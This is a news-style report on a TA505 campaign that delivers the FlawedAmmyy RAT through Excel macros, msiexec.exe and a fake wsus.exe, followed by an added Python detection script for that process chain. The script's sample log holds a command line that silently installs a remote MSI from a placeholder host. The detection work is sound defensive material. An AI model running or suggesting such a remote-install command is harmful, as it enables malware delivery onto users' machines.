The malware attacks start with an email carrying an .xls attachment. The attachment's content is written in Korean, which suggests that Korean users are currently the malware's primary target. The malware uses the malicious macro features of the MS Excel spreadsheet attachment to attack the Windows PC. According to the security firm Proofpoint, the malicious campaign was started by a group named TA505, which has been caught in the past using similar patterns to attack PCs with malware. The security firm further states that this time, the group is using a malicious email along with an Excel attachment which Microsoft itself has asked users not to open. Microsoft has warned users about the malware attacks via its Twitter account. It has tweeted, "When opened, the .xls file automatically runs a macro function that runs msiexec.exe, and that, in turn, downloads an MSI archive. The MSI archive contains a digitally signed executable that is extracted and run[s], and that decrypts and runs another executable in memory."
Microsoft has also said that its Threat Protection defends users from this type of attack. According to the company, "Cloud-based machine learning protections in Microsoft Defender ATP blocked all of the components of this attack at first sight, including the FlawedAmmyy RAT payload. Office 365 ATP detects the email campaign." Once the user opens the attachment on their system, the malware also installs a file named wsus.exe. The downloaded file is then decrypted; it is designed to pass off as an official Microsoft Windows Server Update Services (WSUS) component. The file's digital signature is dated June 19, and the file then decrypts the payload it is carrying in RAM. The payload is none other than the FlawedAmmyy RAT, which has a notorious reputation.
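The process chain described above (Excel macro spawning msiexec.exe to fetch a remote MSI, which then launches a binary named wsus.exe) can be hunted for in process-creation telemetry. The following is an added detection example, not code from the article or from Microsoft or Proofpoint; the log format, field names and sample lines are constructed for illustration, and the URL and paths are placeholders.

```python
# Added example: flag the Excel -> msiexec.exe (remote MSI) -> wsus.exe chain
# in process-creation events. Log lines are constructed, Sysmon-style
# 'Key=Value' fields separated by '|'; the field names are an assumption,
# not a real product schema.
import re

OFFICE_APPS = {"excel.exe", "winword.exe", "powerpnt.exe"}
URL_RE = re.compile(r"https?://", re.IGNORECASE)

def parse_event(line):
    """Parse 'Key=Value' pairs separated by '|' into a dict with lowercased keys."""
    event = {}
    for field in line.split("|"):
        key, _, value = field.partition("=")
        event[key.strip().lower()] = value.strip()
    return event

def basename(path):
    """Return the lowercased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def classify(event):
    """Return a rule name if the event matches one stage of the chain, else None."""
    parent = basename(event.get("parentimage", ""))
    image = basename(event.get("image", ""))
    cmdline = event.get("commandline", "")
    # Stage 1: an Office application spawns msiexec.exe pointed at a remote MSI.
    if parent in OFFICE_APPS and image == "msiexec.exe" and URL_RE.search(cmdline):
        return "office_spawns_msiexec_remote"
    # Stage 2: the MSI install launches a binary named like the WSUS component.
    if parent == "msiexec.exe" and image == "wsus.exe":
        return "msiexec_launches_wsus"
    return None

def detect(lines):
    """Return (rule, image) pairs for every event that matches a stage."""
    hits = []
    for line in lines:
        event = parse_event(line)
        rule = classify(event)
        if rule:
            hits.append((rule, basename(event.get("image", ""))))
    return hits

# Constructed sample telemetry: two malicious events and one benign local install.
SAMPLE_LOG = [
    "ParentImage=C:\\Program Files\\Microsoft Office\\root\\Office16\\EXCEL.EXE|Image=C:\\Windows\\System32\\msiexec.exe|CommandLine=msiexec.exe /i http://example.invalid/pkg.msi /q",
    "ParentImage=C:\\Windows\\System32\\msiexec.exe|Image=C:\\Users\\user\\AppData\\Local\\Temp\\wsus.exe|CommandLine=wsus.exe",
    "ParentImage=C:\\Windows\\explorer.exe|Image=C:\\Windows\\System32\\msiexec.exe|CommandLine=msiexec.exe /i C:\\installers\\app.msi",
]

if __name__ == "__main__":
    for hit in detect(SAMPLE_LOG):
        print(hit)
```

Legitimate installers also invoke msiexec.exe with a URL, so the first rule is worth alerting on mainly when the parent is an Office application, as here; tune the parent list to your environment.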